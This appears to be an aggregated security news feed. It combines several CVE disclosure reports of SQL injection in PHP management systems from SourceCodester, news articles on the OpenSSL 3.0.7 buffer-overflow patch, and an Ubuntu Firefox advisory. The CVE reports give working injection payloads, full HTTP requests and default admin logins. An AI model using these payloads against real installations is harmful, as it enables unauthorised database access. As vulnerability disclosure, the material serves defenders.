Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /odlms/?page=appointments/view_appointment.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Happyd99

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/?page=appointments/view\_appointment&id=

Vulnerability location: /odlms/?page=appointments/view\_appointment&id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/?page=appointments/view\_appointment&id=-5%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /odlms/?page\=appointments/view\_appointment&id\=\-5%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43226: bug_report/SQLi-1.md at main · Happyd99/bug_report

Garage Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /garage/editorder.php.

**Garage Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Happyd99

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /garage/editorder.php?id=

Vulnerability location: /garage/editorder.php?id=, id

dbname = garagedb

\[+\] Payload: /garage/editorder.php?id=-1+union+select+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--+ // Leak place ---> id

GET /garage/editorder.php?id\=\-1+union+select+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=m6rramo7f8jalaggbvjh84b1mm
Connection: close

CVE-2022-41551: bug_report/SQLi-1.md at main · Happyd99/bug_report

By Deeba Ahmed
The OpenSSL vulnerability was first categorized as critical and later as a high-severity buffer overflow bug that impacted all OpenSSL 3.x installations. 
This is a post from HackRead.com Read the original post: OpenSSL Released Patch for High-Severity Vulnerability Detected Last Week

On Thursday, October 27th, 2022, OpenSSL cryptography library developers issued a pre-warning about an upcoming critical update on Tuesday, November 1st to address a high-severity vulnerability. Now, the fix has been released.

It is worth noting that earlier the vulnerability was thought to be the worst ever since **Heartbleed in 2014**.

**What is OpenSSL?**

OpenSSL is an important software library used by servers and apps for data encryption over the internet and networks. It is basically an open-source implementation of the TLS and SSL cryptographic protocols to ensure secure communications. Such as you can see a lock button on the left side of your web address when you are surfing the net on your browser. That’s what OpenSSL does.

**2 Vulnerabilities Identified in OpenSSL**

For your information, Infosec researchers detected two bugs in the OpenSSL platform. As per OpenSSL’s **security advisory**, the first flaw is tracked as **CVE-2022-3602**. It could be exploited with a maliciously long email ID verified with an encryption X.509 certificate to overflow 4 threat actors-controlled bytes on the stack, which will force the app or server to crash or lead to remote code execution if the certificate is validated.

However, this needs a CA to sign the malicious certificate or the app to continue certificate verification even if it fails to create a path to a trusted issuer. If the attacker gains control, they can set up the stack to use the overwritten byes for hijacking the program flow. 

The second bug, also a high-severity vulnerability, is tracked as, **CVE-2022-3786** and is fixed in OpenSSL version 3.0.7. Just like the first one, it triggers a buffer overflow, leading to crashing the app or server after the certificate is signed/accepted. The attacker may craft a malicious email ID in the certificate to overflow an “arbitrary number of bytes containing the ‘.’ character (decimal 46) on the stack,” resulting in a crash and denial of service, the advisory read.

**Details of the Patch**

Project maintainers had warned about the OpenSSL vulnerability last week that was first categorized as critical and later as a high-severity buffer overflow bug that impacted all OpenSSL 3.x installations.

However, developers were sure that the bug was unlikely to allow remote code execution. That’s why it was downgraded to high severity on November 1st, 2022 because it couldn’t be exploited through remote code executions in common situations, which is a significant criterion for critical vulnerabilities. The team has not issued a detailed explanation of the patch but it has urged users to apply the patch as necessary. 

**Assessing the Bugs**

As per the IT security researcher **Marcus Hutchins**, both bugs impacted a “small subset of OpenSSL deployments.” This includes software using version 3.0.0-3.0.6. Operating systems, apps, and servers using these versions must be upgraded to OpenSSL 3.0.7 to fix the bugs.

“Due to the fact OpenSSL 3.0.0 was released in September 2021, it is far less widespread than previous versions. Given the very recent release date, older appliances with hardcoded OpenSSL versions are unlikely to be vulnerable,” Hutchins noted in his **blog post.**

1.  **GitHub fixes critical Flaw that exposed repositories to attackers**
2.  **AttachMe – Oracle Patches “Severe” Flaw in its Cloud Infrastructure**
3.  **Critical Flaw in GPS Tracker Lets Hackers Remotely Control Vehicles**
4.  **Critical Amazon Ring Vulnerability Could Expose Camera Recordings**
5.  **Critical vulnerability allowed hackers to hijack Firefox Android browser**

OpenSSL Released Patch for High-Severity Vulnerability Detected Last Week

Organizations should update to the latest encryption (version 3.0.7) as soon as possible, but there's no need for Heartbleed-like panic, security experts say.

Security experts described two highly anticipated vulnerabilities that the OpenSSL Project team patched Tuesday as issues that need to be addressed quickly, but not necessarily meriting a drop-everything-else type of emergency response.

The release of version 3.0.7 of the almost ubiquitously used cryptographic library addresses two buffer overflow vulnerabilities, which exist in OpenSSL versions 3.0.0 to 3.0.6.

Leading up to the disclosure, security experts had warned that one of the issues, originally characterized as a "critical" remote code-execution issue, could present a Heartbleed-level, all-hands-on-deck problem. Thankfully, that doesn't seem to be the case — and in disclosing the flaw, the OpenSSL project team said it had decided to downgrade the threat to "high" based on feedback from organizations that had tested and analyzed the bug.

**A Pair of Buffer Overflows**

The first bug (CVE-2022-3602) could indeed — under a specific set of circumstances — enable RCE, which originally led some security experts to worry that the flaw could have industry-wide repercussions. But it turns out that there are mitigating circumstances: For one, it's difficult to exploit, as explained below. Also, not all systems are impacted.

Specifically, only browsers that support OpenSSL 3.0.0 through 3.0.6, such as Firefox and Internet Explorer, are impacted at this time, according to Mark Ellzey, senior security researcher at Censys; notably unaffected is Google Chrome, which is the leading Internet browser.

"The impact is expected to be minimal due to the complexity of the attack and the limitations in how it can be carried out," he says. "Organizations should brush up on their phishing training and keep an eye on threat intelligence sources to ensure they are prepared if they are targeted by an attack such as this."

To boot, Alex Ilgayev, lead security researcher at Cycode, noted that the flaw can't be exploited on certain Linux distributions; and, many modern OS platforms implement stack overflow protections to mitigate against threats like these in any event, Ilgayev says.

The second vulnerability (CVE-2022-3786), which was uncovered while a fix for the original flaw was being developed, could be used to trigger denial of service (DoS) conditions. The OpenSSL team assessed the vulnerability as being of high severity but ruled out the possibility of it being used for RCE exploitation.

Both vulnerabilities are tied to a functionality called Punycode for encoding internationalized domain names.

"Users of OpenSSL 3.0.0 - 3.0.6 are encouraged to upgrade to 3.0.7 as soon as possible," the OpenSSL team said in a blog accompanying the bug disclosure and release of the new version of the cryptographic library. "If you obtain your copy of OpenSSL from your Operating System vendor or other third party then you should seek to obtain an updated version from them as soon as possible."

**Not Another Heartbleed**

The bug disclosure is sure to tamp down — for the moment, at least — the widespread concern sparked by the OpenSSL team's notification last week of its then-impending bug disclosure. The description of the first flaw as being "critical," in particular, had prompted several comparisons to 2014's "Heartbleed" bug — the only other bug in OpenSSL to earn a critical rating. That bug (CVE-2014-0160) impacted a wide swathe of the Internet and even now has not be fully addressed at many organizations.

"Heartbleed was exposed by default on any software that used a vulnerable version of OpenSSL, and it was very easily exploitable by attackers to see cryptographic keys and passwords stored in server memory," says Jonathan Knudsen, head of global research at Synopsys Cybersecurity Research Center. "The two vulnerabilities just reported in OpenSSL are serious but not of the same magnitude."

**OpenSSL Bugs Are Hard to Exploit...**

To exploit either of the new flaws, vulnerable servers would need to request client certificate authentication, which is not the norm, Knudsen says. And vulnerable clients would need to connect to a malicious server, which is a commonplace and defensible attack vector, he says.

"Nobody's hair should be on fire about these two vulnerabilities, but they are serious and should be handled with appropriate speed and diligence," he notes.

In a blog post, the SANS Internet Storm Center meanwhile described the OpenSSL update as fixing a buffer overrun during the certificate verification process. For an exploit to work, the certificate would need to contain a malicious Punycode-encoded name, and the vulnerability would be triggered only after the certificate chain is verified.

"An attacker first needs to be able to have a malicious certificate signed by a certificate authority the client trusts," SANS ISC noted. "This does not appear to be exploitable against servers. For servers, this may be exploitable if the server requests a certificate from the client."

Bottom line: The likelihood of exploitation is low since the vulnerability is complex to exploit, as is the flow and requirements to trigger it, Cycode's Ilgayev says. Plus, it affects a relatively small number of systems, compared to those using pre-3.0 versions of OpenSSL.

**...But Do Be Diligent**

At the same time, it is important to keep in mind that hard-to-exploit vulnerabilities have been exploited in the past, Ilgayev says, pointing to a zero-click exploit that the NSO Group developed for a vulnerability in iOS last year.

"\[Also\], like the OpenSSL team says, there is 'no way of knowing how every platform and compiler combination has arranged the buffers on the stack,' and therefore remote code execution may still be possible on some platforms," he cautions.

And indeed, Ellzey outlines one scenario for how attackers could exploit CVE-2022-3602, the flaw that OpenSSL team had originally assessed as critical.

"An attacker would host a malicious server and attempt to get victims to authenticate to it with an application vulnerable to OpenSSL v3.x, potentially through traditional phishing tactics," he says, although the scope is limited due to the exploit being predominantly client-side.

Vulnerabilities such as this highlight the importance of having a software bill of materials (SBOM) for every binary used, Ilgayev notes. "Looking at package managers is not enough as this library could be linked and compiled in various configurations that will affect the exploitability," he says.

The Sky Is Not Falling: Disclosed OpenSSL Bugs Are Serious but Not Critical

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /php_action/printOrder.php.

Permalink

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: 庞习铭

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/printOrder.php

Vulnerability location: /youthappam/php\_action/printOrder.php, id

dbname =youthappam,length=10

\[+\] Payload: orderId=1 and length(database()) = 10 // Leak place ---> id

POST /youthappam/php\_action/printOrder.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
orderId=1 and length(database()) = 10

length = 10 

length = 9

CVE-2022-43331: bug_report/SQLi-3.md at main · YReyi/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /print.php.

Permalink

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: 庞习铭

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/print.php?id=

Vulnerability location: /youthappam/print.php?id=, id

dbname =youthappam,length=10

\[+\] Payload: /youthappam/print.php?id=1%27%20and%20length(database())%20=10--+ // Leak place ---> id

GET /youthappam/print.php?id\=1%27%20and%20length(database())%20\=10\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close

length = 10 

length = 9

CVE-2022-43329: bug_report/SQLi-1.md at main · YReyi/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /editorder.php.

Permalink

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: 庞习铭

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/editorder.php?id=

Vulnerability location: /youthappam/editorder.php?id=, id

dbname =youthappam,length=10

\[+\] Payload: /youthappam/editorder.php?id=1%20and%20length(database())%20=10--+ // Leak place ---> id

GET /youthappam/editorder.php?id\=1%20and%20length(database())%20\=10\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close

length = 10 

length = 9

CVE-2022-43330: bug_report/SQLi-2.md at main · YReyi/bug_report

Ubuntu Security Notice 5709-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. It was discovered that Firefox saved usernames to a plaintext file. A local user could potentially exploit this to obtain sensitive information.

    ==========================================================================Ubuntu Security Notice USN-5709-1November 01, 2022firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Firefox could be made to crash or run programs as your login if itopened a malicious website.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2022-42927,CVE-2022-42928, CVE-2022-42929, CVE-2022-42930, CVE-2022-42932)It was discovered that Firefox saved usernames to a plaintext file. Alocal user could potentially exploit this to obtain sensitive information.(CVE-2022-42931)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         106.0.2+build1-0ubuntu0.20.04.1Ubuntu 18.04 LTS:  firefox                         106.0.2+build1-0ubuntu0.18.04.1After a standard system update you need to restart Firefox to makeall the necessary changes.References:  https://ubuntu.com/security/notices/USN-5709-1  CVE-2022-42927, CVE-2022-42928, CVE-2022-42929, CVE-2022-42930,  CVE-2022-42931, CVE-2022-42932Package Information:  https://launchpad.net/ubuntu/+source/firefox/106.0.2+build1-0ubuntu0.20.04.1  https://launchpad.net/ubuntu/+source/firefox/106.0.2+build1-0ubuntu0.18.04.1

Ubuntu Security Notice USN-5709-1

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/tests/manage_test.php.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: 云影

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/tests/manage\_test.php?id=

Vulnerability location: /odlms/admin/tests/manage\_test.php?id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/tests/manage\_test.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /odlms/admin/tests/manage\_test.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43126: Cve_report/SQLi-1.md at master · vickysuper/Cve_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /appointments/update_status.php.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: 云影

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/appointments/update\_status.php?id=

Vulnerability location: /odlms/admin/appointments/update\_status.php?id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/appointments/update\_status.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /odlms/admin/appointments/update\_status.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

Tag

#firefox